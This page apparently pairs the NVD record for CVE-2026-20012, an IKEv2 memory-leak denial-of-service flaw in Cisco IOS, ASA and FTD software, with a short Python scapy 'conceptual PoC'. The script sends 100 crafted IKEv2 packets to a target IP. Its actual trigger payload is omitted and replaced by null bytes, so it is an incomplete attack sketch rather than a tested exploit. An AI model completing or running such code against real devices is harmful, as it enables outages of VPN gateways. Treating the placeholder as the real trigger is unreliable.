CVE-2026-20012

import time from scapy.all import * # Target IP address of the vulnerable device target_ip = "192.168.1.1" # IKEv2 SA (Security Association) Initiator Packet # This is a conceptual PoC. The specific payload structure # that triggers the memory leak is proprietary to the vendor # and has been omitted for safety reasons. def craft_malicious_ikev2_packet(): # Constructing a basic IKEv2 packet header # Initiator SPI and Responder SPI are usually random ike_hdr = IKEv2(init_SPI=RandString(8), resp_SPI=RandString(8), next_payload='None', exch_type='IKE_SA_INIT', flags='Initiator', msg_id=0) # Malformed payload that triggers parsing error/leak # In a real exploit scenario, specific payload lengths or types are used malformed_payload = Raw(b"\x00" * 100) packet = IP(dst=target_ip)/UDP(dport=500, sport=500)/ike_hdr/malformed_payload return packet if __name__ == "__main__": print(f"[*] Sending crafted IKEv2 packets to {target_ip}...") # Sending multiple packets to trigger the memory leak for i in range(100): pkt = craft_malicious_ikev2_packet() send(pkt, verbose=0) time.sleep(0.1) print("[*] Attack packets sent.")

{"cve": {"id": "CVE-2026-20012", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:10.957", "lastModified": "2026-03-26T15:13:33.940", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Internet Key Exchange version 2 (IKEv2) feature of Cisco IOS Software, Cisco IOS XE Software, Cisco Secure Firewall Adaptive Security Appliance (ASA) Software, and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to trigger a memory leak, resulting in a denial of service (DoS) condition on an affected device.\r\n\r This vulnerability is due to improper parsing of IKEv2 packets. An attacker could exploit this vulnerability by sending crafted IKEv2 packets to an affected device. A successful exploit of Cisco IOS Software and IOS XE Software could allow the attacker to cause the affected device to reload, resulting in a DoS condition. A successful exploit of Cisco Secure Firewall ASA Software and Secure FTD Software could allow the attacker to partially exhaust system memory, resulting in system instability, such as the inability to establish new IKEv2 VPN sessions. A manual reboot of the device is required to recover from this condition."}, {"lang": "es", "value": "Una vulnerabilidad en la función de Intercambio de Claves de Internet versión 2 (IKEv2) de Cisco IOS Software, Cisco IOS XE Software, Cisco Secure Firewall Adaptive Security Appliance (ASA) Software y Cisco Secure Firewall Threat Defense (FTD) Software podría permitir a un atacante remoto no autenticado activar una fuga de memoria, lo que resultaría en una condición de denegación de servicio (DoS) en un dispositivo afectado.\nEsta vulnerabilidad se debe a un análisis incorrecto de los paquetes IKEv2. Un atacante podría explotar esta vulnerabilidad enviando paquetes IKEv2 manipulados a un dispositivo afectado. Un exploit exitoso de Cisco IOS Software y IOS XE Software podría permitir al atacante provocar que el dispositivo afectado se reinicie, lo que resultaría en una condición de DoS. Un exploit exitoso de Cisco Secure Firewall ASA Software y Secure FTD Software podría permitir al atacante agotar parcialmente la memoria del sistema, lo que resultaría en inestabilidad del sistema, como la incapacidad de establecer nuevas sesiones VPN IKEv2. Se requiere un reinicio manual del dispositivo para recuperarse de esta condición."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ftd-ios-dos-kPEpQGGK", "source": "[email protected]"}]}}